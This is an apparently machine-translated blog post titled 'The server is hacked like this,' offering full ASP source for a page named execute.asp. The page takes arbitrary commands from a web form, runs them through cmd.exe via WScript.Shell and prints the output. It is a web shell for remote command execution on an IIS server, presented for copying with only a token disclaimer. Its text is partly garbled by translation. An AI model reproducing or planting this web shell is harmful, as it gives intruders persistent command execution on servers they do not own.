The server is hacked like this.

Recently, I am writing a remote server management plug-in (referring to some of the ASE code, and adding remote command execution, upload, and service functions .) It is worth noting that the program must be supported by FileSystemObject. The following commands are executed remotely: Original code. Copy and save it as execute. asp. <HTML> <Head> <Meta http-equiv = "content-language" content = "ZH-CN"> <Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312"> <Meta name = "generator" content = "Microsoft FrontPage 4.0"> <Meta name = "progid" content = "FrontPage. Editor. Document"> <Title> run the command </title> <Style> <! -- Table, body {font-family:; font-size: 9pt} A {font-family:; font-size: 9pt; color: RGB (0, 32, 64 ); Text-Decoration: None} A: hover {font-family:; color: RGB (255, 0, 0); text-Decoration: None } A: visited {color: RGB (128,0, 0 )} --> </Style> </Head> <Body bgcolor = "#000000" text = "# c0c0c0"> <Form method = "Post" Action = "Execute. asp"> <P align = "Left"> enter the command to be executed: <input type = "text" name = "ML" Size = "20" value = "dir C:/" style = "background-color: # c0c0c0; color: #000000; border-style: solid; border-width: 1 "> <Input type = "Submit" value = "run" name = "B1" style = "background-color: # C0c0c0; color: #000000; Border: 1 groove # c0c0c0 "> </P> </Form> <% ML = request. Form ("ML ") Cmd = "C:/winnt/system32/cmd.exe/C" & ml & "> C:/whoami.txt" 'modify 'Whoami.txt path to a directory with write permission Set wshshell = server. Createobject ("wscript. Shell ") Retcode = wshshell. Run (CMD, 1, true) If retcode = 0 then Response. Write ml &"" Response. Write "Command executed successfully! "&" <Br>" Else Response. Write "command execution failed! Insufficient permissions or the program cannot run in DOS status! "&" <Br>" End if 'Response. Write cmd Function htmlencode (STR) Dim result Dim L If isnull (STR) then Htmlencode = "" Exit Function End if L = Len (STR) Result = "" Dim I For I = 1 to L Select case mid (STR, I, 1) Case "<" Result = Result + "<" Case ">" Result = Result + ">" Case CHR (34) Result = Result + """ Case "&" Result = Result + "& amp ;" Case else Result = Result + mid (STR, I, 1) End select Next Htmlencode = Result End Function Set FS = Createobject ("scripting. FileSystemObject ") Set thisfile = FS. opentextfile ("D:/foxzk/whoami.txt", 1, false) 'read the file and do not forget to modify the path. Counter = 0 Do while not thisfile. atendofstream Counter = counter + 1 Thisline = htmlencode (thisfile. Readline) Response. Write thisline & "<br>" Loop Thisfile. Close Set FS = nothing %> </Body> </Html> Do not use this program for illegal channels. The user shall bear all consequences arising therefrom.